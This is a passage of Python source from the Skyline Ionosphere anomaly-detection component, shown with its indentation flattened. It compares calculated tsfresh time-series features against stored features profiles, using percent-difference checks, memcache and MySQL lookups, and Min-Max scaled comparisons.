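# alternation between Mirage and echo feature profile checks only
# persists while checks for the metric keep arriving frequently
# enough for ionosphere_busy to apply.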
if echo_check:
try:
if fps_db_object:
for row in fps_db_object:
# @added 20201009 - Bug #3782: Exclude disabled echo features profile
if row['enabled'] != 1:
continue
if row['deleted'] == 1:
continue
if int(row['full_duration']) == int(settings.FULL_DURATION):
fp_ids.append(int(row['id']))
echo_fp_ids.append(int(row['id']))
logger.info('appending ionosphere_echo fp id %s matched full_duration of %s - %s' % (str(row['id']), str(settings.FULL_DURATION), base_name))
fp_count_with_echo = len(fp_ids)
echo_fp_count = len(echo_fp_ids)
if echo_fp_count == 0:
echo_check = False
if echo_fp_count > 0:
logger.info('added an additional %s echo fp ids for %s' % (str(echo_fp_count), base_name))
logger.info('determined a total of %s fp ids (incl. echo) for %s' % (str(fp_count_with_echo), base_name))
echo_calculated_feature_file = '%s/%s.echo.tsfresh.input.csv.features.transposed.csv' % (metric_training_data_dir, base_name)
if os.path.isfile(echo_calculated_feature_file):
logger.info('echo calculated features available - %s' % (echo_calculated_feature_file))
echo_calculated_feature_file_found = True
else:
use_context = 'ionosphere_echo_check'
f_calc = None
try:
fp_csv, successful, fp_exists, fp_id, log_msg, traceback_format_exc, f_calc = calculate_features_profile(skyline_app, metric_timestamp, base_name, use_context)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to calculate features')
if os.path.isfile(echo_calculated_feature_file):
logger.info('echo calculated features available - %s' % (echo_calculated_feature_file))
echo_calculated_feature_file_found = True
echo_calculated_features = []
if echo_calculated_feature_file_found:
try:
echo_calculated_features = get_calculated_features(echo_calculated_feature_file)
except:
# 20190412 - just for debug
logger.error(traceback.format_exc())
logger.error('error :: ionosphere_echo_check no echo_calculated_features were determined')
echo_calculated_features = False
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to process echo')
# Compare calculated features to feature values for each fp id
not_anomalous = False
if calculated_feature_file_found:
for fp_id in fp_ids:
if not metrics_id:
logger.error('error :: metric id not known')
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if engine:
engine_disposal(engine)
return False
# @added 20190404 - Bug #2904: Initial Ionosphere echo load and Ionosphere feedback
# Feature #2484: FULL_DURATION feature profiles
# If the Ionosphere features profile checks are approaching the
# ionosphere_max_runtime, skip the remaining checks.
time_now_check = int(time())
# Allow 5 seconds for layers checks to be done
max_runtime_tolerance = ionosphere_max_runtime - 5
running_for = time_now_check - check_process_start
if running_for >= max_runtime_tolerance:
logger.info('features profile checks have been running for %s seconds, the ionosphere_max_runtime is about to be breached, skipping remaining features profile checks' % str(running_for))
break
# @added 20190327 - Feature #2484: FULL_DURATION feature profiles
check_type = 'ionosphere'
if echo_check:
for echo_fp_id in echo_fp_ids:
if fp_id == echo_fp_id:
check_type = 'ionosphere_echo_check'
if check_type == 'ionosphere_echo_check':
if not echo_calculated_features:
continue
# @added 2018075 - Task #2446: Optimize Ionosphere
# Branch #2270: luminosity
fp_checked += 1
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Use Redis set instead of Manager().list to reduce memory
# self.features_profiles_checked.append(fp_id)
redis_set = 'ionosphere.features_profiles_checked'
data = str(fp_id)
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
features_count = None
fp_features = []
# Get features for fp_id from z_fp_<metric_id> table where the
# features profile is the same full_duration
metric_fp_table = 'z_fp_%s' % str(metrics_id)
# @added 20170804 - Bug #2130: MySQL - Aborted_clients
# Set a conditional here to only get_an_engine if no engine, this
# is probably responsible for the Aborted_clients, as it would have
# left the acquired engine orphaned
# Testing on skyline-dev-3-40g-gra1 Fri Aug 4 16:08:14 UTC 2017
if not engine:
try:
engine, log_msg, trace = get_an_engine()
except:
logger.error(traceback.format_exc())
logger.error('error :: could not get a MySQL engine for feature_id and values from %s' % metric_fp_table)
if not engine:
logger.error('error :: engine not obtained for feature_id and values from %s' % metric_fp_table)
# @added 20170809 - Task #2132: Optimise Ionosphere DB usage
# First check to determine if the fp_id has data in memcache
# before querying the database
fp_id_feature_values = None
if settings.MEMCACHE_ENABLED:
fp_id_feature_values_key = 'fp.id.%s.feature.values' % str(fp_id)
try:
# @modified 20191029 - Task #3304: py3 - handle pymemcache bytes not str
# fp_id_feature_values = self.memcache_client.get(fp_id_feature_values_key)
if python_version == 2:
fp_id_feature_values = self.memcache_client.get(fp_id_feature_values_key)
else:
fp_id_feature_values = self.memcache_client.get(fp_id_feature_values_key).decode('utf-8')
# if memcache does not have the key the response to the
# client is None, it does not raise an exception
except:
# @modified 20200501 - Branch #3262: py3
# This is not an error if the data does not exist in
# memcache, it can be expected not to exist in
# memcache if it has not been used in a while.
# logger.error('error :: failed to get %s from memcache' % fp_id_feature_values_key)
logger.info('did not get %s from memcache, will query DB' % fp_id_feature_values_key)
try:
self.memcache_client.close()
except:
# @modified 20170913 - Task #2160: Test skyline with bandit
# pass
logger.error('error :: failed to close memcache_client')
if fp_id_feature_values:
fp_features = literal_eval(fp_id_feature_values)
logger.info('using memcache %s key data' % fp_id_feature_values_key)
if not fp_features:
try:
# @modified 20170913 - Task #2160: Test skyline with bandit
# Added nosec to exclude from bandit tests
stmt = 'SELECT feature_id, value FROM %s WHERE fp_id=%s' % (metric_fp_table, str(fp_id)) # nosec
connection = engine.connect()
for row in engine.execute(stmt):
fp_feature_id = int(row['feature_id'])
fp_value = float(row['value'])
fp_features.append([fp_feature_id, fp_value])
connection.close()
features_count = len(fp_features)
logger.info('determined %s features for fp_id %s' % (str(features_count), str(fp_id)))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine feature_id, value from %s' % metric_fp_table)
if fp_features and settings.MEMCACHE_ENABLED:
fp_id_feature_values_key = 'fp.id.%s.feature.values' % str(fp_id)
try:
self.memcache_client.set(fp_id_feature_values_key, fp_features)
logger.info('populated memcache %s key' % fp_id_feature_values_key)
except:
logger.error('error :: failed to set %s in memcache' % fp_id_feature_values_key)
# @added 20170809 - Task #2132: Optimise Ionosphere DB usage
if settings.MEMCACHE_ENABLED:
try:
self.memcache_client.close()
except:
# @modified 20170913 - Task #2160: Test skyline with bandit
# pass
logger.error('error :: failed to close memcache_client')
# @added 20170107 - Feature #1852: Ionosphere - features_profile matched graphite graphs
# Feature #1844: ionosphere_matched DB table
# Added the calculated features sum for verification purposes
all_calc_features_sum_list = []
# @added 20190327 - Feature #2484: FULL_DURATION feature profiles
if check_type == 'ionosphere':
use_calculated_features = calculated_features
if check_type == 'ionosphere_echo_check':
use_calculated_features = echo_calculated_features
# @modified 20190327 - Feature #2484: FULL_DURATION feature profiles
# Bifurcate for ionosphere_echo_check
# for feature_name, calc_value in calculated_features:
for feature_name, calc_value in use_calculated_features:
all_calc_features_sum_list.append(float(calc_value))
all_calc_features_sum = sum(all_calc_features_sum_list)
# Convert feature names in calculated_features to their id
logger.info('converting tsfresh feature names to Skyline feature ids')
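# TSFRESH_FEATURES is the list of [feature_id, feature_name] pairs
# Skyline uses to map tsfresh feature names to the integer feature ids
# stored in the z_fp_<metric_id> tables, so the comparison below can be
# done on feature ids rather than on the long tsfresh feature name strings.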
calc_features_by_id = []
# @modified 20190327 - Feature #2484: FULL_DURATION feature profiles
# Bifurcate for ionosphere_echo_check
# for feature_name, calc_value in calculated_features:
for feature_name, calc_value in use_calculated_features:
for skyline_feature_id, name in TSFRESH_FEATURES:
if feature_name == name:
calc_features_by_id.append([skyline_feature_id, float(calc_value)])
# Determine what features each data has, extract only values for
# common features.
logger.info('determining common features')
relevant_fp_feature_values = []
relevant_calc_feature_values = []
for skyline_feature_id, calc_value in calc_features_by_id:
for fp_feature_id, fp_value in fp_features:
if skyline_feature_id == fp_feature_id:
relevant_fp_feature_values.append(fp_value)
relevant_calc_feature_values.append(calc_value)
# Determine the count of the common feature values in each set
relevant_fp_feature_values_count = len(relevant_fp_feature_values)
relevant_calc_feature_values_count = len(relevant_calc_feature_values)
if relevant_fp_feature_values_count != relevant_calc_feature_values_count:
logger.error('error :: mismatch in number of common features')
logger.error('error :: relevant_fp_feature_values_count - %s' % str(relevant_fp_feature_values_count))
logger.error('error :: relevant_calc_feature_values_count - %s' % str(relevant_calc_feature_values_count))
continue
else:
logger.info('comparing on %s common features' % str(relevant_fp_feature_values_count))
if relevant_fp_feature_values_count == 0:
logger.error('error :: relevant_fp_feature_values_count is zero')
continue
# Determine the sum of each set
sum_fp_values = sum(relevant_fp_feature_values)
sum_calc_values = sum(relevant_calc_feature_values)
logger.info(
'sum of the values of the %s common features in features profile - %s' % (
str(relevant_fp_feature_values_count), str(sum_fp_values)))
logger.info(
'sum of the values of the %s common features in the calculated features - %s' % (
str(relevant_calc_feature_values_count), str(sum_calc_values)))
# Determine whether each set is positive or negative
# # if the same carry on
# # if both negative, make them both positive
# Sum fp values, Sum calculated - handle negatives like features_sum :: -3389570699080000.0000000000
fp_sum_array = [sum_fp_values]
calc_sum_array = [sum_calc_values]
percent_different = 100
# @modified 20210425 - Task #4030: refactoring
# Feature #4014: Ionosphere - inference
# Use the common function added
# sums_array = np.array([sum_fp_values, sum_calc_values], dtype=float)
# try:
# calc_percent_different = np.diff(sums_array) / sums_array[:-1] * 100.
# percent_different = calc_percent_different[0]
# logger.info('percent_different between common features sums - %s' % str(percent_different))
# except:
# logger.error(traceback.format_exc())
# logger.error('error :: failed to calculate percent_different')
# continue
try:
percent_different = get_percent_different(sum_fp_values, sum_calc_values, True)
logger.info('percent_different between common features sums - %s' % str(percent_different))
except Exception as e:
logger.error('error :: failed to calculate percent_different - %s' % e)
continue
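# As an illustrative example (not taken from a real run): with
# sum_fp_values of 1000.0 and sum_calc_values of 1009.0 the
# percent_different is 0.9, which would be treated as a match if
# IONOSPHERE_FEATURES_PERCENT_SIMILAR were set to, say, 1.0.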
almost_equal = None
try:
np.testing.assert_array_almost_equal(fp_sum_array, calc_sum_array)
almost_equal = True
except:
almost_equal = False
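# np.testing.assert_array_almost_equal raises an AssertionError unless
# the arrays agree to 6 decimal places (its default), so almost_equal
# is only True when the two sums are effectively identical.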
if almost_equal:
not_anomalous = True
# @modified 20170118 - Bug #1860: Debug learn not matched in ionosphere
# This broke it, no variable was interpolated
# logger.info('common features sums are almost equal, not anomalous' % str(relevant_fp_feature_values_count))
logger.info('common features sums are almost equal, not anomalous')
# @added 20161229 - Feature #1830: Ionosphere alerts
# Update the features profile checked count and time
logger.info('updating checked details in db for %s' % (str(fp_id)))
# update matched_count in ionosphere_table
checked_timestamp = int(time())
# @added 20170804 - Bug #2130: MySQL - Aborted_clients
# Set a conditional here to only get_an_engine if no engine, this
# is probably responsible for the Aborted_clients, as it would have
# left the acquired engine orphaned
# Testing on skyline-dev-3-40g-gra1 Fri Aug 4 16:08:14 UTC 2017
if not engine:
try:
engine, log_msg, trace = get_an_engine()
except:
logger.error(traceback.format_exc())
logger.error('error :: could not get a MySQL engine to update checked details in db for %s' % (str(fp_id)))
if not engine:
logger.error('error :: engine not obtained to update checked details in db for %s' % (str(fp_id)))
try:
connection = engine.connect()
connection.execute(
ionosphere_table.update(
ionosphere_table.c.id == fp_id).
values(checked_count=ionosphere_table.c.checked_count + 1,
last_checked=checked_timestamp))
connection.close()
logger.info('updated checked_count for %s' % str(fp_id))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not update checked_count and last_checked for %s ' % str(fp_id))
# if diff_in_sums <= 1%:
if percent_different < 0:
new_pdiff = percent_different * -1
percent_different = new_pdiff
# @added 20190327 - Feature #2484: FULL_DURATION feature profiles
# Bifurcate for ionosphere_echo_check
if check_type == 'ionosphere':
use_percent_similar = float(settings.IONOSPHERE_FEATURES_PERCENT_SIMILAR)
if check_type == 'ionosphere_echo_check':
try:
use_percent_similar = float(settings.IONOSPHERE_ECHO_FEATURES_PERCENT_SIMILAR)
except:
use_percent_similar = 2.0
# @modified 20190327 - Feature #2484: FULL_DURATION feature profiles
# Bifurcate for ionosphere_echo_check
# if percent_different < settings.IONOSPHERE_FEATURES_PERCENT_SIMILAR:
if percent_different < use_percent_similar:
not_anomalous = True
# log
logger.info('not anomalous - features profile match - %s' % base_name)
logger.info(
'calculated features sum is within %s percent of fp_id %s with %s, not anomalous' %
(str(use_percent_similar),
str(fp_id), str(percent_different)))
if check_type == 'ionosphere_echo_check':
logger.info('ionosphere_echo_check - not anomalous with fp id %s for %s' % (str(fp_id), base_name))
# @added 20180617 - Feature #2404: Ionosphere - fluid approximation
# Now if not matched use Min-Max scaling as per
# http://sebastianraschka.com/Articles/2014_about_feature_scaling.html#numpy
# Min-Max scale the fp time series z_ts_<metric_id> SELECT WHERE fp_id
# or from memcache to create minmax_fp_ts
# Min-Max scale the current time series to create minmax_anomalous_ts
# Create features profiles for minmax_fp_ts
# Create features profiles for minmax_anomalous_ts
try:
minmax_scaling_enabled = settings.IONOSPHERE_MINMAX_SCALING_ENABLED
except:
minmax_scaling_enabled = False
minmax_not_anomalous = False
minmax_check = False
minmax = 0
if not not_anomalous:
if minmax_scaling_enabled:
minmax_check = True
if added_by == 'ionosphere_learn' and minmax_check:
minmax_check = False
logger.info('ionosphere_learn job not minmax scaling')
if minmax_check:
logger.info('running minmax scaling')
# First check to determine if the z_ts_<metric_id> for the fp
# has data in memcache before querying the database
metric_fp_ts_table = 'z_ts_%s' % str(metrics_id)
fp_id_metric_ts = []
if settings.MEMCACHE_ENABLED:
# @added 20200421 - Task #3304: py3 - handle pymemcache bytes not str
# Explicitly set the fp_id_metric_ts_object so it
# always exists to be evaluated
fp_id_metric_ts_object = None
fp_id_metric_ts_key = 'fp.%s.%s.ts' % (str(fp_id), str(metrics_id))
try:
# @modified 20191029 - Task #3304: py3 - handle pymemcache bytes not str
# fp_id_metric_ts_object = self.memcache_client.get(fp_id_metric_ts_key)
if python_version == 2:
fp_id_metric_ts_object = self.memcache_client.get(fp_id_metric_ts_key)
else:
fp_id_metric_ts_object = self.memcache_client.get(fp_id_metric_ts_key).decode('utf-8')
# if memcache does not have the key the response to the
# client is None, it does not raise an exception
except:
# @modified 20200501 - Branch #3262: py3
# This is not an error if the data does not exist in
# memcache, it can be expected not to exist in
# memcache if it has not been used in a while.
# logger.error('error :: failed to get %s from memcache' % fp_id_metric_ts_key)
logger.info('did not get %s from memcache, will query DB' % fp_id_metric_ts_key)
try:
self.memcache_client.close()
except:
logger.error('error :: failed to close memcache_client')
if fp_id_metric_ts_object:
# @modified 20200421 - Task #3304: py3 - handle pymemcache bytes not str
# Wrapped in try and except
try:
fp_id_metric_ts = literal_eval(fp_id_metric_ts_object)
logger.info('used memcache %s key data to populate fp_id_metric_ts with %s data points' % (fp_id_metric_ts_key, str(len(fp_id_metric_ts))))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to literal_eval the fp_id_metric_ts_object in minmax_check')
fp_id_metric_ts = []
else:
logger.info('no memcache %s key data, will use database' % fp_id_metric_ts_key)
if not fp_id_metric_ts:
if LOCAL_DEBUG:
logger.debug('debug :: getting data from %s database table for fp id %s to populate the fp_id_metric_ts list' % (metric_fp_ts_table, str(fp_id)))
try:
stmt = 'SELECT timestamp, value FROM %s WHERE fp_id=%s' % (metric_fp_ts_table, str(fp_id)) # nosec
connection = engine.connect()
for row in engine.execute(stmt):
fp_id_ts_timestamp = int(row['timestamp'])
fp_id_ts_value = float(row['value'])
fp_id_metric_ts.append([fp_id_ts_timestamp, fp_id_ts_value])
connection.close()
values_count = len(fp_id_metric_ts)
logger.info('determined %s values for the fp_id time series %s for %s' % (str(values_count), str(fp_id), str(base_name)))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine timestamps and values from %s' % metric_fp_ts_table)
if fp_id_metric_ts and settings.MEMCACHE_ENABLED:
fp_id_metric_ts_key = 'fp.%s.%s.ts' % (str(fp_id), str(metrics_id))
try:
self.memcache_client.set(fp_id_metric_ts_key, fp_id_metric_ts)
logger.info('populated memcache %s key' % fp_id_metric_ts_key)
except:
logger.error('error :: failed to set %s in memcache' % fp_id_metric_ts_key)
try:
self.memcache_client.close()
except:
logger.error('error :: failed to close memcache_client')
# Get anomalous time series
anomalous_ts_values_count = 0
if fp_id_metric_ts:
anomalous_timeseries_not_defined = True
try:
test_anomalous_timeseries = anomalous_timeseries
if len(test_anomalous_timeseries) > 0:
anomalous_timeseries_not_defined = False
except:
logger.info('anomalous_timeseries is not defined, loading from anomaly json')
timeseries_dir = base_name.replace('.', '/')
metric_data_dir = '%s/%s/%s' % (
settings.IONOSPHERE_DATA_FOLDER, metric_timestamp,
timeseries_dir)
anomaly_json = '%s/%s.json' % (metric_data_dir, base_name)
# @added 20190327 - Feature #2484: FULL_DURATION feature profiles
# Bifurcate for ionosphere_echo_check
if check_type == 'ionosphere_echo_check':
anomaly_json = redis_anomaly_json
if not echo_anomalous_timeseries:
try:
with open((redis_anomaly_json), 'r') as f:
raw_timeseries = f.read()
timeseries_array_str = str(raw_timeseries).replace('(', '[').replace(')', ']')
del raw_timeseries
echo_anomalous_timeseries = literal_eval(timeseries_array_str)
del timeseries_array_str
if len(echo_anomalous_timeseries) > 0:
logger.info('echo_anomalous_timeseries was populated from anomaly json %s with %s data points for creating the minmax_anomalous_ts' % (redis_anomaly_json, str(len(echo_anomalous_timeseries))))
else:
logger.error('error :: echo_anomalous_timeseries for minmax_anomalous_ts is not populated from anomaly json - %s' % redis_anomaly_json)
except:
logger.error(traceback.format_exc())
logger.error('error :: could not create echo_anomalous_timeseries from anomaly json %s' % redis_anomaly_json)
else:
logger.info('echo_anomalous_timeseries has %s data points for creating the minmax_anomalous_ts' % (str(len(echo_anomalous_timeseries))))
# @modified 20190327 - Feature #2484: FULL_DURATION feature profiles
# if anomalous_timeseries_not_defined:
if anomalous_timeseries_not_defined and check_type == 'ionosphere':
try:
with open((anomaly_json), 'r') as f:
raw_timeseries = f.read()
timeseries_array_str = str(raw_timeseries).replace('(', '[').replace(')', ']')
del raw_timeseries
anomalous_timeseries = literal_eval(timeseries_array_str)
del timeseries_array_str
if len(anomalous_timeseries) > 0:
logger.info('anomalous_timeseries was populated from anomaly json %s with %s data points for creating the minmax_anomalous_ts' % (anomaly_json, str(len(anomalous_timeseries))))
else:
logger.error('error :: anomalous_timeseries for minmax_anomalous_ts is not populated from anomaly json - %s' % anomaly_json)
except:
logger.error(traceback.format_exc())
logger.error('error :: could not create anomalous_timeseries from anomaly json %s' % anomaly_json)
else:
if check_type == 'ionosphere':
logger.info('anomalous_timeseries has %s data points for creating the minmax_anomalous_ts' % (str(len(anomalous_timeseries))))
# @added 20190327 - Feature #2484: FULL_DURATION feature profiles
if check_type == 'ionosphere':
use_anomalous_timeseries = anomalous_timeseries
if check_type == 'ionosphere_echo_check':
use_anomalous_timeseries = echo_anomalous_timeseries
anomalous_ts_values_count = len(use_anomalous_timeseries)
# @added 20180621 - Feature #2404: Ionosphere - fluid approximation
# Check ranges and only Min-Max scale if the 2 time series
# are similar in range
# @added 20180819 - Bug #2534: Ionosphere - fluid approximation - IONOSPHERE_MINMAX_SCALING_RANGE_TOLERANCE on low ranges
# TODO
try:
range_tolerance = settings.IONOSPHERE_MINMAX_SCALING_RANGE_TOLERANCE
except:
range_tolerance = 0.15
range_tolerance_percentage = range_tolerance * 100
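# For example, with a range_tolerance of 0.15 (the fallback used above)
# a features profile max value of 100 would treat an anomalous max value
# anywhere between 85 and 114 as being in a similar range (the int()
# truncation and range() used below make the bounds approximate).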
check_range = False
range_similar = False
if fp_id_metric_ts:
if anomalous_ts_values_count > 0:
check_range = True
lower_range_similar = False
upper_range_similar = False
if check_range:
try:
minmax_fp_values = [x[1] for x in fp_id_metric_ts]
min_fp_value = min(minmax_fp_values)
max_fp_value = max(minmax_fp_values)
except:
min_fp_value = False
max_fp_value = False
try:
minmax_anomalous_values = [x2[1] for x2 in use_anomalous_timeseries]
min_anomalous_value = min(minmax_anomalous_values)
max_anomalous_value = max(minmax_anomalous_values)
except:
min_anomalous_value = False
max_anomalous_value = False
lower_range_not_same = True
try:
try:
if int(min_fp_value) == int(min_anomalous_value):
lower_range_not_same = False
lower_range_similar = True
logger.info('min value of fp_id_metric_ts (%s) and anomalous_timeseries (%s) are the same' % (
str(min_fp_value), str(min_anomalous_value)))
except:
lower_range_not_same = True
if min_fp_value and min_anomalous_value and lower_range_not_same:
if int(min_fp_value) == int(min_anomalous_value):
lower_range_similar = True
logger.info('min value of fp_id_metric_ts (%s) and anomalous_timeseries (%s) are the same' % (
str(min_fp_value), str(min_anomalous_value)))
else:
lower_min_fp_value = int(min_fp_value - (min_fp_value * range_tolerance))
upper_min_fp_value = int(min_fp_value + (min_fp_value * range_tolerance))
if int(min_anomalous_value) in range(lower_min_fp_value, upper_min_fp_value):
lower_range_similar = True
logger.info('min value of fp_id_metric_ts (%s) and anomalous_timeseries (%s) are similar within %s percent of each other' % (
str(min_fp_value),
str(min_anomalous_value),
str(range_tolerance_percentage)))
if not lower_range_similar:
logger.info('lower range of fp_id_metric_ts (%s) and anomalous_timeseries (%s) are not similar' % (
str(min_fp_value), str(min_anomalous_value)))
upper_range_not_same = True
try:
if int(max_fp_value) == int(max_anomalous_value):
upper_range_not_same = False
upper_range_similar = True
logger.info('max value of fp_id_metric_ts (%s) and anomalous_timeseries (%s) are the same' % (
str(max_fp_value), str(max_anomalous_value)))
except:
upper_range_not_same = True
if max_fp_value and max_anomalous_value and lower_range_similar and upper_range_not_same:
# @added 20180717 - Task #2446: Optimize Ionosphere
# Feature #2404: Ionosphere - fluid approximation
# On low values such as 1 and 2, the range_tolerance
# should be adjusted to account for the very small
# range. TODO
lower_max_fp_value = int(max_fp_value - (max_fp_value * range_tolerance))
upper_max_fp_value = int(max_fp_value + (max_fp_value * range_tolerance))
if int(max_anomalous_value) in range(lower_max_fp_value, upper_max_fp_value):
upper_range_similar = True
logger.info('max value of fp_id_metric_ts (%s) and anomalous_timeseries (%s) are similar within %s percent of each other' % (
str(max_fp_value), str(max_anomalous_value),
str(range_tolerance_percentage)))
else:
logger.info('max value of fp_id_metric_ts (%s) and anomalous_timeseries (%s) are not similar' % (
str(max_fp_value), str(max_anomalous_value)))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not calculate range similarity with the current anomalous_timeseries and the fp id %s time series' % (str(fp_id)))
if lower_range_similar and upper_range_similar:
range_similar = True
else:
logger.info('the ranges of fp_id_metric_ts and anomalous_timeseries differ significantly, Min-Max scaling will be skipped')
minmax_fp_ts = []
# if fp_id_metric_ts:
if range_similar:
if LOCAL_DEBUG:
logger.debug('debug :: creating minmax_fp_ts from minmax scaled fp_id_metric_ts')
try:
minmax_fp_values = [x[1] for x in fp_id_metric_ts]
x_np = np.asarray(minmax_fp_values)
# Min-Max scaling
np_minmax = (x_np - x_np.min()) / (x_np.max() - x_np.min())
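# Min-Max scaling maps each value v to (v - min) / (max - min) so the
# series is rescaled to the 0.0 to 1.0 range, e.g. [2, 4, 6] becomes
# [0.0, 0.5, 1.0], which allows the shapes of the two time series to be
# compared independently of their absolute magnitudes.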
for (ts, v) in zip(fp_id_metric_ts, np_minmax):
minmax_fp_ts.append([ts[0], v])
logger.info('minmax_fp_ts list populated with the minmax scaled time series with %s data points' % str(len(minmax_fp_ts)))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not minmax scale fp id %s time series for %s' % (str(fp_id), str(base_name)))
if not minmax_fp_ts:
logger.error('error :: minmax_fp_ts list not populated')
minmax_anomalous_ts = []
if minmax_fp_ts:
# Only process if they are approximately the same length
minmax_fp_ts_values_count = len(minmax_fp_ts)
if minmax_fp_ts_values_count - anomalous_ts_values_count in range(-14, 14):
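# range(-14, 14) allows the two time series to differ in length by
# roughly a dozen data points (a difference of -14 up to 13) before
# the minmax scaled comparison is skipped as not being like for like.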
try:
minmax_anomalous_values = [x2[1] for x2 in use_anomalous_timeseries]
x_np = np.asarray(minmax_anomalous_values)
# Min-Max scaling
np_minmax = (x_np - x_np.min()) / (x_np.max() - x_np.min())
for (ts, v) in zip(fp_id_metric_ts, np_minmax):
minmax_anomalous_ts.append([ts[0], v])
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine np_minmax with current time series anomalous_timeseries and fp id %s time series' % (str(fp_id)))
if len(minmax_anomalous_ts) > 0:
logger.info('minmax_anomalous_ts is populated with %s data points' % str(len(minmax_anomalous_ts)))
else:
logger.error('error :: minmax_anomalous_ts is not populated')
else:
logger.info('minmax scaled check will be skipped - anomalous_ts_values_count is %s and minmax_fp_ts_values_count is %s' % (str(anomalous_ts_values_count), str(minmax_fp_ts_values_count)))
minmax_fp_ts_csv = '%s/fpid.%s.%s.minmax_fp_ts.tsfresh.input.std.csv' % (
settings.SKYLINE_TMP_DIR, str(fp_id), base_name)
minmax_fp_fname_out = minmax_fp_ts_csv + '.transposed.csv'
anomalous_ts_csv = '%s/%s.%s.minmax_anomalous_ts.tsfresh.std.csv' % (
settings.SKYLINE_TMP_DIR, metric_timestamp, base_name)
anomalous_fp_fname_out = anomalous_ts_csv + '.transposed.csv'
# @modified 20210101 - Task #3928: Update Skyline to use new tsfresh feature extraction method
# tsf_settings = ReasonableFeatureExtractionSettings()
# tsf_settings.disable_progressbar = True
minmax_fp_features_sum = None
minmax_fp_features_count = 0
minmax_anomalous_features_sum = None
minmax_anomalous_features_count = 0
if minmax_anomalous_ts and minmax_fp_ts:
if LOCAL_DEBUG:
logger.debug('debug :: analyzing minmax_fp_ts and minmax_anomalous_ts')
if not os.path.isfile(minmax_fp_ts_csv):
if LOCAL_DEBUG:
logger.debug('debug :: creating %s from minmax_fp_ts' % minmax_fp_ts_csv)
datapoints = minmax_fp_ts
converted = []
for datapoint in datapoints:
try:
new_datapoint = [float(datapoint[0]), float(datapoint[1])]
converted.append(new_datapoint)
# @added 20210425 - Task #4030: refactoring
except TypeError:
# This allows for the handling when the
# entry has a value of None
continue
# @modified 20210425 - Task #4030: refactoring
# except: # nosec
except Exception as e:
logger.error('error :: could not create converted timeseries from minmax_fp_ts - %s' % e)
continue
del datapoints
if LOCAL_DEBUG:
if len(converted) > 0:
logger.debug('debug :: converted is populated')
else:
logger.debug('debug :: error :: converted is not populated')
for ts, value in converted:
try:
utc_ts_line = '%s,%s,%s\n' % (base_name, str(int(ts)), str(value))
with open(minmax_fp_ts_csv, 'a') as fh:
fh.write(utc_ts_line)
except:
logger.error(traceback.format_exc())
logger.error('error :: could not write to file %s' % (str(minmax_fp_ts_csv)))
del converted
else:
logger.info('file found %s, using for data' % minmax_fp_ts_csv)
if not os.path.isfile(minmax_fp_ts_csv):
logger.error('error :: file not found %s' % minmax_fp_ts_csv)
else:
logger.info('file exists to create the minmax_fp_ts data frame from - %s' % minmax_fp_ts_csv)
try:
df = pd.read_csv(minmax_fp_ts_csv, delimiter=',', header=None, names=['metric', 'timestamp', 'value'])
df.columns = ['metric', 'timestamp', 'value']
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to created data frame from %s' % (str(minmax_fp_ts_csv)))
try:
df_features = extract_features(
# @modified 20210101 - Task #3928: Update Skyline to use new tsfresh feature extraction method
# df, column_id='metric', column_sort='timestamp', column_kind=None,
# column_value=None, feature_extraction_settings=tsf_settings)
df, default_fc_parameters=EfficientFCParameters(),
column_id='metric', column_sort='timestamp', column_kind=None,
column_value=None, disable_progressbar=True)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to created df_features from %s' % (str(minmax_fp_ts_csv)))
del df
# Create transposed features csv
if not os.path.isfile(minmax_fp_fname_out):
# Transpose
df_t = df_features.transpose()
df_t.to_csv(minmax_fp_fname_out)
del df_t
else:
if LOCAL_DEBUG:
logger.debug('debug :: file exists - %s' % minmax_fp_fname_out)
try:
# Calculate the count and sum of the features values
df_sum = pd.read_csv(
minmax_fp_fname_out, delimiter=',', header=0,
names=['feature_name', 'value'])
df_sum.columns = ['feature_name', 'value']
df_sum['feature_name'] = df_sum['feature_name'].astype(str)
df_sum['value'] = df_sum['value'].astype(float)
minmax_fp_features_count = len(df_sum['value'])
minmax_fp_features_sum = df_sum['value'].sum()
logger.info('minmax_fp_ts - features_count: %s, features_sum: %s' % (str(minmax_fp_features_count), str(minmax_fp_features_sum)))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to created df_sum from %s' % (str(minmax_fp_fname_out)))
if minmax_fp_features_count > 0:
if LOCAL_DEBUG:
logger.debug('debug :: minmax_fp_features_count of the minmax_fp_ts is %s' % str(minmax_fp_features_count))
else:
logger.error('error :: minmax_fp_features_count is %s' % str(minmax_fp_features_count))
if not os.path.isfile(anomalous_ts_csv):
datapoints = minmax_anomalous_ts
converted = []
for datapoint in datapoints:
try:
new_datapoint = [float(datapoint[0]), float(datapoint[1])]
converted.append(new_datapoint)
# @added 20210425 - Task #4030: refactoring
except TypeError:
# This allows for the handling when the
# entry has a value of None
continue
# @modified 20210425 - Task #4030: refactoring
# except: # nosec
except Exception as e:
logger.error('error :: could not create converted timeseries from minmax_anomalous_ts - %s' % e)
continue
del datapoints
for ts, value in converted:
utc_ts_line = '%s,%s,%s\n' % (base_name, str(int(ts)), str(value))
with open(anomalous_ts_csv, 'a') as fh:
fh.write(utc_ts_line)
del converted
df = pd.read_csv(anomalous_ts_csv, delimiter=',', header=None, names=['metric', 'timestamp', 'value'])
df.columns = ['metric', 'timestamp', 'value']
df_features_current = extract_features(
# @modified 20210101 - Task #3928: Update Skyline to use new tsfresh feature extraction method
# df, column_id='metric', column_sort='timestamp', column_kind=None,
# column_value=None, feature_extraction_settings=tsf_settings)
df, default_fc_parameters=EfficientFCParameters(),
column_id='metric', column_sort='timestamp', column_kind=None,
column_value=None, disable_progressbar=True)
del df
# Create transposed features csv
if not os.path.isfile(anomalous_fp_fname_out):
# Transpose
df_t = df_features_current.transpose()
df_t.to_csv(anomalous_fp_fname_out)
